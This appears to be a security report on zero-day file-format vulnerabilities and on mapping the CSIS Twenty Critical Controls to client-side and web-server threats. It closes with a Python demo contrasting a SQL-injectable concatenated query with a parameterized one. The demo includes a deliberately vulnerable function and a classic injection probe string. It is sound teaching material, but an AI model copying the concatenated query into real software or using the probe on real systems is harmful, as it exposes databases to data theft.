The "File Format Vulnerabilities" continue to be the first choice for attackers to conduct zero-day and targeted attacks. Most of the attacks continue to target Adobe PDF, Flash Player and Microsoft Office Suite (PowerPoint, Excel and Word) software. Multiple publicly available "fuzzing" frameworks make it easier to find these flaws. The vulnerabilities are often found in 3rd party add-ons to these popular and wide-spread software suites, making the patching process more complex and increasing their potential value to attackers.

The notable zero-day vulnerabilities during past 6 months were:

  • Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862)
  • Microsoft Office Web Components ActiveX Control Code Execution Vulnerability (CVE-2009-1136)
  • Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (CVE-2008-0015)
  • Microsoft DirectX DirectShow QuickTime Video Remote Code Execution Vulnerability (CVE-2009-1537)
  • Adobe Reader Remote Code Execution Vulnerability (CVE-2009-1493)
  • Microsoft PowerPoint Remote Code Execution Vulnerability (CVE-2009-0556)

The ease of finding zero-day vulnerabilities is a direct result of an overall increase in the number of people world-wide with the skills to discover vulnerabilities. This is evidenced by the fact that TippingPoint DVLabs often receives the same vulnerability from multiple sources.

For example, MS08-031 (Microsoft Internet Explorer DOM Object Heap Overflow Vulnerability) was discovered independently by three researchers. The first researcher submitted this critical remote vulnerability in IE 6/7 on Oct 22, 2007. A second, independent researcher submitted the same vulnerability on April 23, 2008, and a third on May 19, 2008. All three submissions outlined different approaches to auditing for and finding the same vulnerability.

The implication of increasing duplicate discoveries is alarming: the main mitigation for vulnerabilities of this type is patching, and patching cannot protect against a zero-day exploit, since by definition no patch yet exists. The risk from cyber criminals, who can discover zero-day vulnerabilities and exploit them for profit, is correspondingly heightened. Add to this that software vendors have not necessarily lowered their average time to patch vulnerabilities reported to them, and that TippingPoint is aware of a number of vulnerabilities that were reported to vendors two years ago and are still awaiting a patch.

http://www.zerodayinitiative.com/advisories/upcoming/

This makes zero-day exploits in client-side applications one of the most significant threats to your network, and requires that you put in place additional information security measures and controls to complement your vulnerability assessment and remediation activities.

Best Practices in Mitigation and Control of The Top Risks

A few weeks ago, the Center for Strategic and International Studies published an updated version of the Twenty Critical Controls for Effective Cyber Defense.

http://csis.org/files/publication/Twenty_Critical_Controls_for_Effective_Cyber_Defense_CAG.pdf

These controls reflect the consensus of many of the nation's top cyber defenders and attackers on which specific controls must be implemented first to mitigate known cyber threats.

One of the most valuable uses of this report is to help organizations deploying the Twenty Critical Security Controls confirm that no critical new attacks have been found that would force substantial changes in the Twenty Controls, and at the same time to help those implementing the Controls focus their attention on the elements that need to be completed most immediately.

The Key Elements of these attacks and associated Controls:

  • User applications have vulnerabilities that can be exploited remotely,
    • Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable software is accounted for, identified for defensive planning, and remediated in a timely manner. Control 5 (Boundary Defenses) can provide some prevention/detection capability when attacks are launched.
  • There is an increasing number of zero-days in these types of applications,
    • Control 12 (Malware Defenses) is the most effective at mitigating many of these attacks because it can ensure that malware entering the network is effectively contained. Controls 2, 3, and 10 have minimal impact on zero-day exploits and Control 5 can provide some prevention/detection capabilities against zero-days as well as known exploits.
  • Successful exploitation grants the attacker the same privileges on the network as the user and/or host that is compromised,
    • Control 5 (Boundary Defenses) can ensure that compromised host systems (portable and static) can be contained. Controls 8 (Controlled Use of Administrative Privileges) and 9 (Controlled Access) limit what access the attacker has inside the enterprise once they have successfully exploited a user application.
  • The attacker is masquerading as a legitimate user but is often performing actions that are not typical for that user.
    • Controls 6 (Audit Logs) and 11 (Account Monitoring and Control) can help identify potentially malicious or suspicious behavior and Control 18 (Incident Response Capability) can assist in both detection and recovery from a compromise.

Critical Controls - As Applied to HTTP Server Threats

As discussed previously, web application vulnerabilities and server-side HTTP threats pose a serious threat not only to the web servers you control, but also the servers that your users visit in day-to-day activities. Trends have indicated that SQL injection attacks are rising rapidly. SQL injection attacks are only valid if an application is written in such a way as to allow them; vulnerability is not a matter of configuration or (usually) access control.

The Key Elements of these attacks and associated Controls:

  • Web applications have vulnerabilities that can be easily discovered and exploited remotely.
    • Control 7 (Application Software Security) is perhaps the most critical control regarding these types of attacks. Application developers should ensure that all input received from remote sources is sanitized of data meaningful to backend database systems. Control 5 (Boundary Defenses) can ensure that the appropriate layered protections are in place to prevent/detect attacks aimed at your web servers. Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable applications are accounted for, identified for defensive planning, and remediated in a timely manner.
  • Successful exploitation grants the attacker the ability to put malicious code on the server and attempt to compromise all clients that browse that server.
    • Control 6 (Audit Logs) can assist in identifying when someone has compromised your web server. Control 18 (Incident Response Capability) can help mitigate the impact of, and assist in recovery from, attacks against vulnerable applications.
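Control 7's requirement that input from remote sources be sanitized before it reaches the database is best met by keeping data out of the SQL text altogether. The following is an added example (not from the report or the CSIS document) that puts a string-concatenated query beside its parameterized form, using an in-memory SQLite table with invented rows so the difference can be run and observed.

```python
import sqlite3


def make_db():
    """Constructed sample table; the rows are invented for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    conn.commit()
    return conn


def find_user_vulnerable(conn, name):
    """Builds the statement by string concatenation. Whatever the remote
    source sends becomes part of the SQL, so a quote character ends the
    literal and the rest of the input is interpreted as SQL."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Parameterized statement: the SQL text is fixed and the driver hands
    `name` to the database as a value. Input can never change the query's
    structure, and names containing quotes are handled correctly."""
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


def vulnerable_query_errors(conn, name):
    """True when the concatenated form fails on this input. Even a legitimate
    value such as o'brien breaks it, which is one way these flaws surface in
    application error logs long before anyone abuses them."""
    try:
        find_user_vulnerable(conn, name)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"   # constructed input containing SQL metacharacters
    print(find_user_safe(db, "alice"))              # [('alice', 'admin')]
    print(len(find_user_vulnerable(db, probe)))     # 3: the WHERE clause was rewritten
    print(find_user_safe(db, probe))                # []: the whole string is just a name
    print(vulnerable_query_errors(db, "o'brien"))   # True
```

The vulnerable function is kept only to show the defect: the same input that returns no rows through the parameterized query returns every row through the concatenated one, and an ordinary name containing an apostrophe breaks it outright. Escaping or filtering input is a second line of defence; the parameter mechanism is the primary control because it removes the ambiguity between data and statement entirely, which is the property Control 7 is asking developers to guarantee.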
